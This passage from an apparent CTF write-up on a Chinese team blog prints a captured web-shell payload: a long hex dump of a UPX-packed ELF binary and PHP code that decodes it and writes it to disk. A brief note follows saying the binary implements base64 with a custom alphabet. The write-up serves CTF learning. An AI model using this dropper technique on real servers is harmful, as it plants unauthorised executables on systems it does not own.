696C65206973207061636B6564207769746820746865205550582065786563757461626C65207061636B657220687474703A2F2F7570782E73662E6E657420240A002449643A2055505820342E313020436F707972696768742028432920313939362D323032332074686520555058205465616D2E20416C6C205269676874732052657365727665642E20240A00906A0E5A575EEB015E6A025F6A01580F056A7F5F6A3C580F055F29F66A02580F0585C078DC50488DB70F000000AD83E0FE4189C6565B8B16488D8DF5FFFFFF448B394C29F94529F74901CE5F525057514D29C94183C8FF6A22415A525E6A035A29FF6A09580F054889442410505A535EAD504889E14989D5AD50AD41904889F75EFFD559488B742418488B7C24106A055A6A0A580F0541FFE55DE87AFFFFFF2F70726F632F73656C662F65786500000100000D0C00001708000002000000FFFFFFE5E84A0083F94975445357488D4C37FD5E565BEB2F4839CE7332565EFFFBFFFFAC3C80720A3C8F7706807EFE0F74062CE83C0177E41B1656AD28D075FFFFBFFFDF5F0FC829F801D8AB1203ACEBDF5BC35841564157504889E64881ECFEEDFFDB001059545F6A0A59F348A548833E000575F84989FE48ABB674B3CB0CFC0A0CF6FF02FEDF6EFFF54D29FCBAFF0F37575E8C7BED6A59580F0585C07905DB6FFFDF0E6A0F5891FD498D7DFFB000AA1A740EFFF3A43BEFFF7F5BFE03C7072020203D3E0CE7F84C89F94829E189C831F883F07FDBDEF20883E008C76F26083877F848C1E903FD6FFF7F898D6708FC4B8D0C268B43FC23014801C141595E5F58BE6DB7F2AF08B9E25033C502E8E84806C37FE4D60E15C4084424205B498BB5A02C6F66B03765EFE85D0761B2C941897C6B7FFFD86A02596A015ABEF329FFE8050689DFE83ABEFDC2D65FBA0B15FF66F8B00955CA0FB6C0EEFBF6DFD1483D00F0FFFF720499C8FFC3B9EE21B84DF7BBB7CF8ACEE91431B03CEB02B00C030302F04DD3340B0A0100EBBC0051DBEEDFBE6F174C8B47DF8D4AFF730ABF7F33E8C750FFEDDFDA6F4FF9FF74114163B0FFC949FFC08806077BFB86EDC6EBE957570A1758C3415581D54154040FB7ED76CC55D1FD5303F331EC28820FEBDE1BDC84E644572410BA0C09DB9651FF0BDBAD8BF7108B141483751581FE555058217560DF74B7112F7D0030B5EB0485F675800BDBFFCD4639C677F289C2483B1377EB0A486008B775B7DB736C4954247D8B7DAC4C084450ED750B5B1812C20FD552C65E1BFF5BBBB974202E75B8B7211984C90F95C231C04DBBBCF0DB85E407C085C2741D82FE0002770523BB6D5B7933750F4E1A04C9357B08447B6BB66ED44014DE45458C0D89F2B7D9BEE69BBAC6E8DBFE545B031D532314B6B6D0486E18035E25C4FBEF68FF285B5D415C415DC31573D1743640F6C70175302DDC0D7F610FC8F04C39C1741249010F9487EEB670D6DF8608ED07024F08328E856FA5C9081EC710EBD04F57B4FCDB0F1DF05553FC555335EC684C03672048D6BAC7AD4B84242CFD3C78E1E676DCDA4004DC304C47284C092263DB7EE18B38A7B75710744C09470D019DC6BBED7F2B78486683FA0275041078B870284531573F8EF08E2031D2B9329B043E8648E8B96F6FDBB4FDC366197F100274C60F85AC1C1FBFCEBD2AF6E9A40740035638B980B8B6BDA97503002316E60F44C89CCD4B6C5BE1FFDB31FF83C122FFCA7821F4F1166A46667BBBB139E90F42030346280AC385C7C2B7D829C638EBDB77E5A53BEDB33DB6EB09C3A310E3F6C1B4B6D2DB860567EB13E6ED750E6D5EC725BB51D8A610B0D845C8B39DBACDBD20DEE80BA807C7B903868DB7FDFDBC4929EEBA3800C70C1C9E476F2F6C86C0DC717C210074231A3C2406FEF436E1751C49BB1330BE036801F2E852BAED731BD1E97E2A2201F5733549BB85AF6B284167168B540454184060DBEDFF62517383E107C1E102D36C0D836403075D7F6597DE4B2FCC75435E49035720E87D9C1DBAEFAE493C1A05D4DBEE3C2783133604C70E3A4630B41004CD9C49C3201D367DD847F7C789FA5B81E2316EB446E3F27C52167F29D5DE9D0C3C061951A74C8D2C37B385CDE4350C49583202A425DB6A0B42F02E95FB0DDC3DFBE363BF83CAFF137506BD3CB112A79B736CA9D0EE418689C1AE937061C39DFB6D39C51A20015019DF53F768206B3128DB50C54086EB77DDE8F529F6820274164489E9C6E61D6CFBFDF7D9FC81E1B2F3AA4EFD7D84E0D7DD9EC1DA53F551B8FF0001EC657B6FE12304C8BA090372D0C372F7BD981665496F10493B20F5E1BF777C0A4A8D1C3021D8F7D8255B83F803773A84F761FC36195C310C742D2EFFB92241BF178143BA8D41745CE8C870733FB9FAD4BAC374373889C7038C70B82D3E5A0C12BA9E8F482DC2630D67B826DB7413A611C67A07A5DA0F0FFEE81CFC07186B730F1127248F284E74B2DE6AEC06930D4C3B26A6274C29F062B9E7062A929197DA42D38DDB4C3641495B7512EEDE3639B6604738C6C438390C0F8C40B5ED263DE5ED2B304DE318E5FA6DD2616810F0415E415F2946E079AB262BCE31C94D7FD5B1B9B637016D405320C3353F07117B1BE3070C2817BC2480D863DBDCC154B6D0983829C23CDC1C6DEB302E04147D36C00C2B6DBB634DE8259D415355E17663E1F6B96DD827F1E9372875E859EBDCDB36B6BE094DC219F71FC4E8071232D2D60DF2415A2C7D870C2DDC40778F0541DA037572C53F3BBCD02E117D104E46E87BF931A5C05DFA7E7817BA000446EED1E87614A23B04E7C40F4A481149749BE1578C4A41504302C0EC57F67E1A228940D28B17BE208612AEC10D8012BA17387EDB6916DCFF865645C50B8230613B8171A9482DE04A6E7B438B473D39E5535256D9654A0DDC60895B5C500C4B09930B16DBC76F07530A8B36E8125831C3D25DA25D0152593F57567C5958A06A2C0474C601F050577FFB030D49C951EB4E8B1E07EEFC11DB8A166F1D6DE3F3C30182F005FA2F7E058A10DBEEE1FF762083FDFC771B83E9048BAE040889171D7F9A785BE00473EF85041F740F48A417B6806B25AB0A158FF13BF6C4D2C2FC16084FDA5B081C255ADBCAC604C7595765B0B7F8656772E68D410A12FFC816E87F91BD11C00F73CE83E803721DC15221F75617D0D209D05D259648F7B7FE843FF5EFFFD1B663E87243EB0E3108866CC27E7233FFC10F235FC96C8BF6C01D73E2D2AB1022F0CB1B8C34FD00FB83D102E8E5B215323CC230D6CCE405477245C8CC1B5A58CA5E90F4E2C40FB250F64E7523F6E8D66419E47901E80E3E02B6F20C65ABC2E01765CF954797F3C03EC1916D3448116D02C491EE976FC1F311C1E84DFDC0540000000000800400FF6C0B00000E000000020000001088A290000000000000004800FF2F130000ED05000002000000B7FFFFFF4743433A2028474E552920342E382E35203230313530363233145265BBFF3FFB6420486174172D34342900002E73796D746162077472DCFE61276809696E74657270076E6FFF836DBF2E4142492D15670D676E752E6275696C64DC5B3BF22D6964006861380964796E4FF6EDACCD074519764473696F6E0C83BD77135F1B72656C61280970CE3577DF6C74726905746578660C1B92FF6FDB6F64B0610D65685F6672616D655F686472874DFED9315F61727261790B6A5873B7D86372862469637AB404DADB67B3655162737304636F6D45B0FF22DBE70000030001003802401790279007020054030074902790270400980500B8C807C827060090030700EE7C806D13080404170900203D813C810A00380B00F807D83281470C05170D03EC13C800B00E00A40F2F403E81950F1710002C10909F403E1100A01200101E6090279007130018140020C82790271500281600F81F7C806D071704201718006036813C811900C11A133B92775301170400F1FF0C1B340D5716BF197F02E00B39D8902E171006C58664904150575F84C86097A70117664F1992C1AE8D47709943D8951097B8D7BFE70884601707C88470211F0F12D61FD9D810360047E20512D7ECCA884DF3470FFC2F32CE2119100F010FD8C9F6BD25012D0DA70F0217D8005633352063511795C5AE8C3F5C472FC89035CD6E10C17775849C3D399F0D87014781414E0E36952F360A09845D4991A0BFA64727CF0E32BA52082FE401C536840D21D817EBEF5E09E7100A021F1702F2E4C913673F0B6002230292ADDD05321711027FB86003D61B3F1797045F063B39C84E300F658F5E2643D6742FC88F63C9C1A6040F6A47ED07296132C85074C70C7672B0802F9D06C317856790B3833D08BF158F0EC2200D1F80414F97021B42B840AA1FBEA7198441067C7137C686B0291B18EFD247EC196C9041601C17F2586280C15FB074FB7F89B73375666693005F5F4A43525F4C495354097F6B6F710064326567691A065F746D5F636CADACC4163D65B8125ADCDEDE34646F5F670B62616C09746F672D61E22D0A757800E0F3652C2EB0BF29642E36333535245F38162DBAB85F0C723E6A03E6B67864751C79320D5FAE9DB0176F2A6D6112B2B9FFB16F5073653634BB4652414D455F454E44BCDB840D9BC90B3C642A44B6B6B0CB594E494319D60774420BFFDF12474C4F42414C5F4F4646534506547F5BECF6EF4C45426C696263F17375B30F49F4B02DE1544D5F200C430B540EF6622BBDF200E54C70750DED6F175A4040514942435F322E010765ADE05A7B1EB5B23E23035B5833B466F347C3261F5947CF2E00707072156624610B475E656E66676A631D6C163277667C12C59B011BD9E15F3F1EBA1BE4DD655C6637676D6F6E5F275CA151E173CC7849EDC276EB16094F18644B5F75C464286C428C06536F52CC51779B650A697A345F0487FB9B7CE7001A6477636872BE82F0237B6F70659F4A765F52710CCFD1166F61417C2E19380CC1E05183EF9C66DB96409A0977110099C1248ECA001B2BCEDE8C925FA7073F1C698664480123071964900154542021199221043128196490747424831CF26E44BFF6FFFF6F9898900C3624057F084D2A20CD4E0B47C960C1E00767FB06A41964B23F18560327BC49056F073F5D02D20D255EBFFF48CEDEA49707BF122DE9866C02076B3FFE10727649BF04BF201C16ECB0007A2A3F204D58989B07E73F0C32D895FF843F42380CC8208338C00CDF0B36808E979F3FF8949CE02607FF1ADEAC4236893F5F07866C48CE2F90100794071964C83FB0B0F20924835C20009AE4ECCD22EF07BF09C186A4A1A07FB03F48866490B07C08BD598564A8FF074336949C7F74B63FA02279E626077F040246419AEEC00F0E03DF17D9796F072F3FCC32C880340F1818996C3604D8BF7F206986400620DD061C6490012828D00132C8909C0610E632370142EF077F2A64872D07EB3F8692B3C907203F58F406196448606061D99140488FFA4BB3DC64B23FC107BFB2C1869207FF1330172C841C163F2D076053363B117B00EE7FB2198BE40801BB009A9367BDF8217F80071D2E72081B40097F782900C02279F8020100000000000020FF00000000555058210000000000555058210E160208D049E7EECEB82E3DF033000024240000F0330000000000BEF4000000";
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=2)
    $buf.=urldecode("%".substr($c,$i,2));
echo(@fwrite(fopen($f,"a"),$buf)?"1":"0");

接下来交给逆向手。

易知文件功能是变表 base64,如下位置发现编码表,然后直接解即可

Licensed under CC BY-NC-SA 4.0
© 2024 - 2025 UKFC
使用 Hugo 构建
主题 StackJimmy 设计